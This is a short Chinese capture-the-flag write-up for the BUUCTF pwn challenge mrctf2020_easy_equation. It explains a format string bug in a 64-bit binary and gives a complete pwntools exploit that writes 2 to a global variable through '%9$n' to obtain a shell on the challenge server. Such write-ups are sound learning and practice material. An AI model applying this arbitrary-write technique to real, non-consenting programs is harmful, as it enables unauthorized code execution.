[BUUCTF]PWN——mrctf2020_easy_equation（格式化字符串）

mrctf2020_easy_equation

附件

步骤

1. 例行检查，64位程序，只开启了nx保护
   
2. 本地试运行一下，看看大概的情况，%p，那边，明显的格式化字符串漏洞
   
3. 64位ida载入
   
   只要满足第8行的条件即可获取shell，python算一下得到结果是2
   
   所以这题是用格式化字符串漏洞，将judge上的值修改称即可
   

利用过程

1. 确定偏移量，补了一个b之后偏移是8
   
   由于64位传参，肯定存在被/x00截断的情况，所以我动调看了一下
   我们要做的是将judge里的值修改成2，一开始我是这样写的，payload = "BB%8$n"+p64(judge)，动调看一下，偏移应该是9
   
   被/x00截断了，而且偏移也不对，重新写成payload = "BB%9$nAAA"+p64(judge)
   
   %n：将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置
   bb%9$n：将2赋值到judge地址上，aaa是我用来补占位的

完整exp

from pwn import *
context.log_level='debug'

p = remote("node3.buuoj.cn",25534)
#p = process("./mrctf2020_easy_equation")

judge = 0x060105C
payload = "BB%9$nAAA"+p64(judge) 
p.sendline(payload)
p.interactive()